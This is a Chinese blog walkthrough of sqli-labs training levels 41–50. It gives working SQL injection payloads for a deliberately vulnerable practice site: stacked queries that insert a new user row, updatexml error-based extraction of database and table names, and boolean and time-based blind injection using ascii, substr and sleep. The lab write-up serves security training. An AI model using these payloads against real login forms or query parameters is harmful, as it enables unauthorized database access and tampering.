sqli-labs靶场通关攻略(41-60)

已于 2024-08-29 19:54:38 修改
阅读量460 收藏 1
点赞数 12
文章标签: 数据库
于 2024-08-28 19:06:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kknifek/article/details/141645482
版权

第四十一关

联合查询爆出数据库

但这关考察的时堆叠注入 ,我们给他注入一条数据

输入id=50即可查到我们注入的数据

 

第四十二关

看页面似曾相识,上次我们是用注册新用户然后对其他账户进行登录从而造成注入,但这次不能注册新用户了

存在堆叠注入函数,所以我们可以在密码哪里使用堆叠注入。向数据库里面插入密码账号,这样我们再来使用其进行登录就很简单了。 

login_user=1&login_password=1';insert into users(id,username,password) values ('39','less30','123456')--+&mysubmit=Login

 因为密码处有报错,所以我们使用报错注入爆出库名

login_user=1&login_password=1000'or updatexml(1,concat(1,database()),3)--+&mysubmit=Login

第四十三关

和第四十二关一样,只是闭合方式不同

login_user=1&login_password=1000')or updatexml(1,concat(1,database()),3)--+&mysubmit=Login

第四十四关

这关和四十二关一样,但是不能使用报错注入,不会显示报错信息

因为页面只有两种,我们尝试布尔盲注 ,正确页面没显示,确定数据库名为8位

用ascii码测试出库名,SCII码等于115,所以得出数据库第一位是s,继续测其它位就行

login_user=1&login_password=1000' or (ascii(substr(database() ,1,1)))=115--+&mysubmit=Login

第四十五关

和上一关一样,只是闭合方式不同,采用布尔盲注即可

第四十六关

这一关和其他关有所不同,根据页面提示我们的参数变成了sort,我们输入?sort=1,进入下图界面

输入?sort=1'会报错,就先尝试一下报错注入吧

 

成功爆出库名

?sort=1 and updatexml(1,concat(1,database()),3)--+ 

 

爆表名

?sort=1 and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),3)--+

 

第四十七关

和上一关一样,只是闭合不同

?sort=1' and updatexml(1,concat(1,database()),3)--+

爆出库名

第四十八关

这关只有两个页面,所以考虑使用时间盲注

测出数据库有8位

?sort=1 and if(length(database())=8,sleep(1),1)--+

 

使用时间盲注语句得出数据库名第一位ascii码为115,同方法依次查出库名

?sort=1 and if(ascii(substr(database(),1,1))=115,sleep(3),1)--+ 

 

第四十九关

和第四十八关一样,只不过是闭合不同

?sort=1' and if(length(database())=8,sleep(1),1)--+

 

第五十关

先加个'看看,报错了我们尝试使用报错函数

直接爆出库名

 ?sort=updatexml(1,concat(0x7e,database(),0x7e),1)

 

 

 

 

桶将军T
关注
  • 12
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Sqli-labs靶场详细攻略Less 29-33
qq_41755084的博客
10-27 1578
这一关在web应用前有一个waf,在关卡列表界面直接点开是没有的,要在地址栏输入才是有waf保护的界面其实这里并不是真正的硬件waf,只是有两个函数模拟了waf的功能和收到参数的反应。sqlilabs靶场也提供了能够部署真正硬件waf的代码,不过随着时代的发展,waf也在变化,专门配置这样一个waf也没太有必要,直接使用这个模拟题目的就好了。这一关在正常配置waf的情况下,的结构图如下所示客户端在访问服务器端时,需要先经过一个tomcat服务器,这个tomcat服务器中部署的过滤代码充当了waf。
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1303
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 14万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
Sqli-labs靶场1-20通关宝典
2203_75440207的博客
05-18 2065
本文章主要是关于sqli-labs靶场1-20关的通关方法
sqli-labs靶场通关(1-10)
Fly_Mojito的博客
06-11 3665
sqli-labs靶场通关(1-10)
SQL注入之SQLI-LABS靶场通关秘籍
Sunnie_yoo的博客
07-03 1039
反之,参数不符合规范,则会触发报错,我们就是利用这个,通过 updatexml() 函数的报错回显我们需要的信息。注入流程与 Less-5 类似,不过这里的判断标准不是回显的信息,而是响应时间。因此网页存在字符型注入漏洞,并且使用单引号和括号进行闭合,注意到此网页并没有返回任何信息,我们需要使用 Bool 盲注进行注入。注入万能密码试试,用户名随便写点东西,使用 OR 运算符构造恒真条件,使用“#”注释掉后面的内容注入,网页提示我们注入成功,由于此时使用的时单引号闭合,因此这里是字符型注入。
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1709
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
Sqli-labs靶场第12关详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 609
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
Sqli-labs靶场第21、22关详解[Sqli-labs-less-21、22]自动化注入-SQLmap工具注入|sqlmap跑base64加密
m0_73615178的博客
03-03 981
由于21/22雷同,都是需要登录后,注入点通过Cookie值进行测试,值base64加密修改注入数据选项:--tamper=base64encode。
MySQL 相关知识笔记
weixin_68929783的博客
08-23 2676
以上是根据 B 站黑马课程学习后的 MySQL 笔记,为了日后复习和给别人参考而整理,希望对大家有所帮助。同时,在实际应用中,还需要根据具体情况合理使用索引、约束等功能,以提高数据库的性能和数据的完整性。
修复数据库中的 “Access Denied: SUPER Privilege Required” 错误
xiaochong0302的博客
08-26 712
当您使用数据库时,您可能会看到错误消息:“Access denied; you need (at least one of) the SUPER privilege(s) for this operation”。当您的数据库用户没有足够的权限来执行某些操作时,就会发生这种情况。
汉服文化平台网站
heye0910032的博客
08-26 827
本文主要探讨了使用Java语言开发汉服文化平台网站的全过程。系统采用B/S架构,严格遵循软件开发流程,从分析、设计到实现,确保了项目的系统性和科学性。系统主要面向管理员和用户两大类使用者,提供了包括首页、个人中心、汉服知识管理、服装展示管理、用户相册管理、论坛交流、系统管理、订单管理等功能。本系统的应用,旨在实现汉服文化信息管理的信息化,提高管理效率,方便用户访问和交流。通过本毕业设计,我深入学习并实践了Java语言和SSM框架在Web开发中的应用。
python12 中,No module named‘distutils‘错误
qq_43557600的博客
08-27 3963
python12 “ No module named'distutils' ”,​ 安装 pip install setuptools ,解决 ​
(1)Hilt的基本概念和使用
challenge51all的专栏
08-27 727
Jetpack Hilt 是一个强大的依赖注入框架,它简化了 Android 应用中的依赖管理,提高了代码的可维护性和可测试性。通过使用注解和模块,开发人员可以轻松地管理应用中的依赖关系,并在不同的组件之间共享和注入依赖。在应用的 Application 类上使用这个注解,告诉 Hilt 这是一个使用 Hilt 进行依赖注入的应用。Jetpack Hilt 是一个用于 Android 的依赖注入框架,它建立在 Dagger 的基础上,旨在简化 Android 应用中的依赖注入过程。
MYSQL数据库初体验
qq_63994746的博客
08-28 892
面向Windows操作系统简单、易用华为:欧拉阿里:龙蜥腾讯:tencentOS麒麟:(银河麒麟、中标麒麟 – >centos 优麒麟 – > Ubuntu )统信:uos红旗深度:deepin。
ASP.NET Core 入门教学四 集成Redis
最新发布
Life is not divided
08-28 163
ASP.NET Core 项目中集成了 Redis 缓存。现在,你可以利用 Redis 的高性能缓存功能来提升你的应用程序性能。
linux上datax 安装以及使用
寂夜了无痕的博客
08-24 2554
linux上datax 安装以及使用
2019 下午 CLI举例:通过ISAKMP方式建立GRE over IPsec隧道
qq_25467441的博客
08-23 396
http://127.0.0.1:51299/icslite/hdx.do?docid=HDXAZN01177_03_zh#topicid=ZH-CN_TASK_0000001555595308
threadlocal的一些用法,以及如何解决可重入分布式redis锁
pige666的博客
08-26 264
好的,经过我的思考,threadlocal是一个还不错的选择,因为是对线程内共享的,事实上threadlocal应该是为了解决一些在线程内传递状态所使用的手段,(要不然你还得疯狂传参,中间要是遇到封装的第三方库,你还改不了),好,这个状态其实说起来应该是叫上下文context比较合适,除了状态外,它也可以是用户身份,任务信息等。这里的话对于可重入分布式锁,就可以有一个Integer类型的threadlocal变量,重入就+1,释放就-1,直到0了,才真正释放锁就可以了。
sqli-labs靶场通关
08-25
对于sqli-labs靶场通关,你需要具备一定的SQL注入的知识和技巧。以下是一些通关的步骤和提示: 1. 确保你已经安装了LAMP/WAMP/MAMP服务器环境,并将sqli-labs源码解压到Web服务器的根目录下。 2. 打开浏览器,访问sqli-labs的首页,通常是 http://localhost/sqli-labs/。 3. 在首页上,你会看到一系列的级别和挑战。从级别1开始,逐步挑战更高级别的注入漏洞。 4. 阅读每个级别的说明和提示,理解目标和漏洞类型。 5. 使用SQL注入的技巧来寻找漏洞并进行利用。一些常见的注入技巧包括:使用单引号、双引号绕过输入过滤、使用UNION SELECT语句、使用注释符绕过过滤、使用布尔盲注等。 6. 尝试不同的Payload(载荷)来获取敏感信息或执行恶意操作。例如,获取数据库的表名、列名、数据内容,或者尝试修改数据库中的数据。 7. 当你成功获取到关键信息或者完成了特定的目标,即可认为通关。 需要注意的是,在进行sqli-labs靶场挑战时,请确保你在合法的环境中进行,不要尝试攻击他人的系统或进行非法活动。同时,及时备份并恢复你的环境,以防误操作导致数据丢失。 希望这些步骤和提示对你有所帮助!如有更多问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值